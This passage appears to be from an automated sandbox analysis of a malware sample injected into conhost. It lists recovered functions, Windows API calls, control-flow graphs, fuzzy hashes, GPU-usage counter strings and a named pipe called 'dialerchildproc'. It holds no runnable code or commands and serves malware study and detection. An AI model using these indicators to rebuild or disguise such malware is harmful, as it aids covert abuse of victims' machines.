                                                          • Instruction Fuzzy Hash: 674160B424396AA0EB0CEBE4E8717D82321BB7934CF805517E539032F59EB8828EC351
                                                          Function 000001D29E8C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 2ed38ce0bfe92cfc6d426f4a0aed6e84b6004037ec12347840be1909283ea6d2
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: E7515E72202B94C6EB58CFA2E55839EB7B1FB99F99F044125DA6947728DF3CC049C700
                                                          Function 000001D29E896D40 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 230COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: f657af5a7311de4a118e6514e9e0da52f7b43398537b80d622928719daad3973
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: B181E471E1366186FAAC9BE6D8783DD2290B7B57CCF584027E935477B6DB3AC8419300
                                                          Function 000001D29E8CD258 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 158 1d29e8cd258-1d29e8cd27a GetLastError 159 1d29e8cd27c-1d29e8cd287 FlsGetValue 158->159 160 1d29e8cd299-1d29e8cd2a4 FlsSetValue 158->160 161 1d29e8cd289-1d29e8cd291 159->161 162 1d29e8cd293 159->162 163 1d29e8cd2ab-1d29e8cd2b0 160->163 164 1d29e8cd2a6-1d29e8cd2a9 160->164 165 1d29e8cd305-1d29e8cd310 SetLastError 161->165 162->160 166 1d29e8cd2b5 call 1d29e8cdafc 163->166 164->165 167 1d29e8cd312-1d29e8cd324 165->167 168 1d29e8cd325-1d29e8cd33b call 1d29e8ccb78 165->168 169 1d29e8cd2ba-1d29e8cd2c6 166->169 181 1d29e8cd33d-1d29e8cd348 FlsGetValue 168->181 182 1d29e8cd358-1d29e8cd363 FlsSetValue 168->182 171 1d29e8cd2d8-1d29e8cd2e2 FlsSetValue 169->171 172 1d29e8cd2c8-1d29e8cd2cf FlsSetValue 169->172 175 1d29e8cd2f6-1d29e8cd300 call 1d29e8ccfc4 call 1d29e8cdb74 171->175 176 1d29e8cd2e4-1d29e8cd2f4 FlsSetValue 171->176 174 1d29e8cd2d1-1d29e8cd2d6 call 1d29e8cdb74 172->174 174->164 175->165 176->174 185 1d29e8cd34a-1d29e8cd34e 181->185 186 1d29e8cd352 181->186 187 1d29e8cd3c8-1d29e8cd3cf call 1d29e8ccb78 182->187 188 1d29e8cd365-1d29e8cd36a 182->188 185->187 189 1d29e8cd350 185->189 186->182 191 1d29e8cd36f call 1d29e8cdafc 188->191 192 1d29e8cd3bf-1d29e8cd3c7 189->192 194 1d29e8cd374-1d29e8cd380 191->194 195 1d29e8cd392-1d29e8cd39c FlsSetValue 194->195 196 1d29e8cd382-1d29e8cd389 FlsSetValue 194->196 198 1d29e8cd39e-1d29e8cd3ae FlsSetValue 195->198 199 1d29e8cd3b0-1d29e8cd3ba call 1d29e8ccfc4 call 1d29e8cdb74 195->199 197 1d29e8cd38b-1d29e8cd390 call 1d29e8cdb74 196->197 197->187 198->197 199->192
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD267
                                                          • FlsGetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD27C
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD29D
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD2EC
                                                          • SetLastError.KERNEL32(?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000001D29E8CF0FC,?,?,?,?,000001D29E8CC3CF,?,?,?,?,?,000001D29E8C7EE0), ref: 000001D29E8CD35C
                                                            • Part of subcall function 000001D29E8CDAFC: HeapAlloc.KERNEL32(?,?,00000000,000001D29E8CD432,?,?,?,000001D29E8CDAE5,?,?,?,?,000001D29E8CDBA8), ref: 000001D29E8CDB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD384
                                                            • Part of subcall function 000001D29E8CDB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001D29E8C643A), ref: 000001D29E8CDB8A
                                                            • Part of subcall function 000001D29E8CDB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001D29E8C643A), ref: 000001D29E8CDB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D29E8D0E9B,?,?,?,000001D29E8D088C,?,?,?,000001D29E8CCC7F), ref: 000001D29E8CD3A6
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: ab3d3014e2f21f0527fbf4387121fd05dd36f69811c7164c4df139058022b2af
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: 51413A3024366446FB5CB7F155753FD63827B667BCF18572AE9360AAF6EA38D4028200
                                                          Function 000001D29E8C2FAC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: cb2dbe6f83b17fc0d67bd7ee7cd5aa67c5ffb3d51e3a622a1cf9f3977aee0871
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: C631D772602B6487FB18DF92A8143DDA3A0FFA8B9DF444126DE7943A75DF38C0968740
                                                          Function 000001D29E8C30BC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: 683f8b830d29f6793bc4e6085011839e2be0b11f996f6a325a1ad19a6bf7271c
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: E131F731602B258AFB18DFA2A85479963A0FBA5F99F044127EE7943735DF38C486C300
                                                          Function 000001D29E8CA974 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 1d29e8ca974-1d29e8ca9dc call 1d29e8cb844 324 1d29e8ca9e2-1d29e8ca9e5 321->324 325 1d29e8cae43-1d29e8cae4b call 1d29e8ccb78 321->325 324->325 326 1d29e8ca9eb-1d29e8ca9f1 324->326 329 1d29e8caac0-1d29e8caad2 326->329 330 1d29e8ca9f7-1d29e8ca9fb 326->330 331 1d29e8caad8-1d29e8caadc 329->331 332 1d29e8cad93-1d29e8cad97 329->332 330->329 333 1d29e8caa01-1d29e8caa0c 330->333 331->332 336 1d29e8caae2-1d29e8caaed 331->336 334 1d29e8cadd0-1d29e8cadda call 1d29e8c9a64 332->334 335 1d29e8cad99-1d29e8cada0 332->335 333->329 337 1d29e8caa12-1d29e8caa17 333->337 334->325 349 1d29e8caddc-1d29e8cadfb call 1d29e8c7d70 334->349 335->325 339 1d29e8cada6-1d29e8cadcb call 1d29e8cae4c 335->339 336->332 341 1d29e8caaf3-1d29e8caafa 336->341 337->329 338 1d29e8caa1d-1d29e8caa27 call 1d29e8c9a64 337->338 338->349 352 1d29e8caa2d-1d29e8caa58 call 1d29e8c9a64 * 2 call 1d29e8ca154 338->352 339->334 342 1d29e8cab00-1d29e8cab37 call 1d29e8c9e40 341->342 343 1d29e8cacc4-1d29e8cacd0 341->343 342->343 357 1d29e8cab3d-1d29e8cab45 342->357 343->334 350 1d29e8cacd6-1d29e8cacda 343->350 354 1d29e8cacea-1d29e8cacf2 350->354 355 1d29e8cacdc-1d29e8cace8 call 1d29e8ca114 350->355 389 1d29e8caa5a-1d29e8caa5e 352->389 390 1d29e8caa78-1d29e8caa82 call 1d29e8c9a64 352->390 354->334 356 1d29e8cacf8-1d29e8cad05 call 1d29e8c9ce4 354->356 355->354 365 1d29e8cad0b-1d29e8cad13 355->365 356->334 356->365 363 1d29e8cab49-1d29e8cab7b 357->363 367 1d29e8cab81-1d29e8cab8c 363->367 368 1d29e8cacb7-1d29e8cacbe 363->368 370 1d29e8cae26-1d29e8cae42 call 1d29e8c9a64 * 2 call 1d29e8ccad8 365->370 371 1d29e8cad19-1d29e8cad1d 365->371 367->368 372 1d29e8cab92-1d29e8cabab 367->372 368->343 368->363 370->325 374 1d29e8cad1f-1d29e8cad2e call 1d29e8ca114 371->374 375 1d29e8cad30 371->375 376 1d29e8cabb1-1d29e8cabf6 call 1d29e8ca128 * 2 372->376 377 1d29e8caca4-1d29e8caca9 372->377 385 1d29e8cad33-1d29e8cad3d call 1d29e8cb8dc 374->385 375->385 403 1d29e8cabf8-1d29e8cac1e call 1d29e8ca128 call 1d29e8cb068 376->403 404 1d29e8cac34-1d29e8cac3a 376->404 382 1d29e8cacb4 377->382 382->368 385->334 400 1d29e8cad43-1d29e8cad91 call 1d29e8c9d74 call 1d29e8c9f80 385->400 389->390 394 1d29e8caa60-1d29e8caa6b 389->394 390->329 402 1d29e8caa84-1d29e8caaa4 call 1d29e8c9a64 * 2 call 1d29e8cb8dc 390->402 394->390 399 1d29e8caa6d-1d29e8caa72 394->399 399->325 399->390 400->334 427 1d29e8caabb 402->427 428 1d29e8caaa6-1d29e8caab0 call 1d29e8cb9cc 402->428 421 1d29e8cac20-1d29e8cac32 403->421 422 1d29e8cac45-1d29e8caca2 call 1d29e8ca8a0 403->422 409 1d29e8cacab 404->409 410 1d29e8cac3c-1d29e8cac40 404->410 414 1d29e8cacb0 409->414 410->376 414->382 421->403 421->404 422->414 427->329 431 1d29e8cae20-1d29e8cae25 call 1d29e8ccad8 428->431 432 1d29e8caab6-1d29e8cae1f call 1d29e8c96dc call 1d29e8cb424 call 1d29e8c98d0 428->432 431->370 432->431
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: df78c5f59cf1bb2888a392de598625eae80d0b12cfa10b111f4050832870d3b4
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: E6E19D72602B609AEB28DFA5D4503DD37A4F766B8CF005557EEBA57BA9CB34C580C700
                                                          Function 000001D29E899D74 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: 3c1d1e0ea5e291d5167f9d0baf28b11f036ef0a43fb8c40c078e7ab707b6fd5c
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: A3E1CF36A02B609AEB28DFA5D4683DD77A0F775B8CF100516EEB957BA9CB34D481C700
                                                          Function 000001D29E8CF7C4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 442 1d29e8cf7c4-1d29e8cf816 443 1d29e8cf81c-1d29e8cf81f 442->443 444 1d29e8cf907 442->444 445 1d29e8cf821-1d29e8cf824 443->445 446 1d29e8cf829-1d29e8cf82c 443->446 447 1d29e8cf909-1d29e8cf925 444->447 445->447 448 1d29e8cf8ec-1d29e8cf8ff 446->448 449 1d29e8cf832-1d29e8cf841 446->449 448->444 450 1d29e8cf851-1d29e8cf870 LoadLibraryExW 449->450 451 1d29e8cf843-1d29e8cf846 449->451 454 1d29e8cf926-1d29e8cf93b 450->454 455 1d29e8cf876-1d29e8cf87f GetLastError 450->455 452 1d29e8cf84c 451->452 453 1d29e8cf946-1d29e8cf955 GetProcAddress 451->453 456 1d29e8cf8d8-1d29e8cf8df 452->456 458 1d29e8cf957-1d29e8cf97e 453->458 459 1d29e8cf8e5 453->459 454->453 457 1d29e8cf93d-1d29e8cf940 FreeLibrary 454->457 460 1d29e8cf881-1d29e8cf898 call 1d29e8ccd58 455->460 461 1d29e8cf8c6-1d29e8cf8d0 455->461 456->449 456->459 457->453 458->447 459->448 460->461 464 1d29e8cf89a-1d29e8cf8ae call 1d29e8ccd58 460->464 461->456 464->461 467 1d29e8cf8b0-1d29e8cf8c4 LoadLibraryExW 464->467 467->454 467->461
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: a4c69b54cb6bdf7cec9938ac5b604fb2665deba4bbff5f41d560188b163afdf8
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: A741C571313A2091FB1ADB96A8247E963D1FB66BE8F054127DD3D577A4DF38C4499300
                                                          Function 000001D29E8C104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 468 1d29e8c104c-1d29e8c10b9 RegQueryInfoKeyW 469 1d29e8c10bf-1d29e8c10c9 468->469 470 1d29e8c11b5-1d29e8c11d0 468->470 469->470 471 1d29e8c10cf-1d29e8c111f RegEnumValueW 469->471 472 1d29e8c11a5-1d29e8c11af 471->472 473 1d29e8c1125-1d29e8c112a 471->473 472->470 472->471 473->472 474 1d29e8c112c-1d29e8c1135 473->474 475 1d29e8c1147-1d29e8c114c 474->475 476 1d29e8c1137 474->476 478 1d29e8c114e-1d29e8c1193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 475->478 479 1d29e8c1199-1d29e8c11a3 475->479 477 1d29e8c113b-1d29e8c113f 476->477 477->472 480 1d29e8c1141-1d29e8c1145 477->480 478->479 479->472 480->475 480->477
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: 97138f55e1463c9248ece60b4044fe400d30b7db9d3b85f2e4456424710aa288
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 84419273215B94C6E764CF61E45439E77B1F789B98F448116DAA907768DF3CC889CB00
                                                          Function 000001D29E8CD498 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000001D29E8CCC0E,?,?,?,?,?,?,?,?,000001D29E8CD3CD,?,?,00000001), ref: 000001D29E8CD520
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 24a6bf533a8fe68b584a175c90bbdd8739000e8860d1df61a008008e47886064
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 52118E3034726081FB5CB7E5A5713F963817BA63FCF48572AE939066FADE38D5028200
                                                          Function 000001D29E8C2334 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction ID: db28b0a6fccb13f95e9ab0e56f4354309450baf28b7b75bae2659d2b87a95409
                                                          • Opcode Fuzzy Hash: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
                                                          • Instruction Fuzzy Hash: E2117C72615B64C2E7148B61F41439E6760FB99BA8F504316EA7A02BB8CF7CC589CB00
                                                          Function 000001D29E8C7940 Relevance: 12.2, APIs: 8, Instructions: 230COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
